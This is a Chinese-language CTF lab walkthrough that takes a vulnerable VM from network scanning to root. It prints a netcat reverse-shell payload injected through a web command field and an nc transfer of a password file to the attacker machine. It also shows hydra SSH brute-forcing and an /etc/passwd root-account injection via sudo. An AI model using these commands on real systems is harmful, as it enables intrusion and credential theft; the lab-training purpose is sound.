目录

导入靶机

信息收集

发现IP

目录扫描

端口扫描

访问 web

弱口令爆破

反弹shell

获得交互式 shell

提权

使用 hydra 暴力破解

SSH 连接 jim 用户

登录charles账户

使用 teehee 创建 root 用户

---

导入靶机

点击重试

然后网卡换成 NAT模式，开启靶机

信息收集

发现IP

arp-scan -l

发现靶机是 192.168.109.162

目录扫描

python3 dirsearch.py -u 192.168.109.162

扫出来的目录基本都是跳转到了 index.php

端口扫描

nmap -p- -A 192.168.109.162

发现只有 22 和 80 端口

访问 web

弱口令爆破

准备用Burp 爆破来着，但突然发现密码 admin 可以登录上去

发现可以执行系统命令，然后抓包，发现 radio 这里可以修改命令

反弹shell

在 kali 开启监听端口

nc -lvvp 8888

替换 payload，然后发包，返回 kali 发现反弹shell 成功

nc+-e+/bin/bash+192.168.109.139+8888

获得交互式 shell

python -c 'import pty;pty.spawn("/bin/bash")'

提权

进入根目录的家目录，经过一番查看在 jim 用户下发现了一个密码字典

通过 nc 把 old-passwords.bak 的内容传入到 kali，用于 ssh 的暴力破解

先在 kali 用 nc 监听一个端口 4444，并把监听到的数据写入 pwd.txt

rlwrap nc -lvnp 4444 > pwd.txt

 nc 192.168.109.139 4444 < old-passwords.bak

发现传入成功

使用 hydra 暴力破解

• -l: 指定用户 jim
• -P：指定密码字典
• -vV：显示详细信息
• -f：破解成功之后立马停止爆破

hydra -l jim -P pwd.txt -vV -f ssh://192.168.109.162

破解得到 jim 的密码是 jibril04

SSH 连接 jim 用户

ssh jim@192.168.109.162

继续查看 jim 用户里的内容

cat /home/jim/mbox

看上去像是邮件，再去 /var/mail 查看邮件

cat /var/mail/jim

发现了 Charles 的密码是 ^xHhA&hvim0y

登录charles账户

ssh charles@192.168.109.162

sudo -l

发现 charles 用户有执行 teehee 命令的权限

使用 teehee 创建 root 用户

echo "egg::0:0:::/bin/sh" | sudo teehee -a /etc/passwd
tail -l /etc/passwd

在 jim 用户切换 root 权限用户，然后在 root 目录发现了 flag.txt 文件，在里面发现了 flag